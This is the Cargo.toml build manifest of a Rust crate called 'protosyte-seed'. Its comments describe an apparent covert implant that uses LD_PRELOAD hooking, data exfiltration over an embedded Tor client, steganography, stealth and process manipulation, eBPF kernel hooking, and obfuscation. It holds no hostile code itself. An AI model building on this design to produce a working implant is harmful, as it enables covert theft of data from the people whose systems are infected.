[package]
name = "protosyte-seed"
version = "0.1.0"
edition = "2021"

[lib]
name = "protosyte_seed"
crate-type = ["cdylib", "rlib"]

# Note: hook_lib.rs is built separately as a standalone shared library for LD_PRELOAD
# Build command: cargo build --lib --manifest-path Cargo.toml --features hook_lib
# Or create a separate crate in protosyte-seed-hook/

[dependencies]
# Protobuf serialization/deserialization (Primary)
prost = { version = "0.14", features = ["derive"] }
prost-types = "0.14"

# Network exfiltration over Tor
reqwest = { version = "0.12", features = ["rustls-tls", "socks", "multipart"] } # SOCKS5 proxy for Tor (fallback)
arti-client = { version = "0.14", features = ["tokio", "native-tls"] } # Embedded Tor client
tokio = { version = "1.40", features = ["full"] } # Async runtime

# In-memory data processing & steganography
image = { version = "0.25", default-features = false, features = ["png"] } # LSB steganography
aes-gcm = "0.10" # Encryption of payloads
lz4 = "1.28" # Compression before encryption
zeroize = "1.8" # Securely zero memory

# System integration & stealth
libc = "0.2"
nix = "0.28" # For syscalls, process manipulation
aya = { version = "0.13", features = ["async_tokio"], optional = true } # eBPF kernel-level hooking

# Post-quantum cryptography (optional)
pqcrypto-kyber = { version = "0.5", optional = true }  # Kyber-768 (ML-KEM)
pqcrypto-dilithium = { version = "0.5", optional = true }  # Dilithium-3 (ML-DSA)

# AI-driven filtering (optional)
ort = { version = "2.0.0-rc.10", features = ["cpu"], optional = true }  # ONNX Runtime
ndarray = { version = "0.16", optional = true }  # Array operations for AI

# Additional utilities
sha2 = "0.10" # For HMAC-SHA256
hmac = "0.12" # For HMAC computation
hex = "0.4" # For hex encoding
rand = "0.9" # For jitter calculation
regex = "1.10" # For pattern matching
ctor = "0.6.2" # For library constructors

[build-dependencies]
prost-build = "0.14"

[target.'cfg(all(target_arch = "x86_64", target_os = "linux"))'.build-dependencies]
# eBPF compilation requires clang/LLVM - handled by build.rs

[features]
default = []
obfuscate = []  # Enable compile-time obfuscation
post-quantum = ["pqcrypto-kyber", "pqcrypto-dilithium"]  # Enable post-quantum crypto
ai-filtering = ["ort", "ndarray"]  # Enable AI-driven data filtering
ebpf = ["aya"]  # Enable eBPF kernel-level hooking

[dependencies.protosyte-seed-macros]
path = "../protosyte-seed-macros"
version = "0.1.0"

[dev-dependencies]
tokio-test = "0.4"  # For async testing utilities
mockito = "1.2"  # For HTTP mocking
tempfile = "3.10"  # For temporary file testing

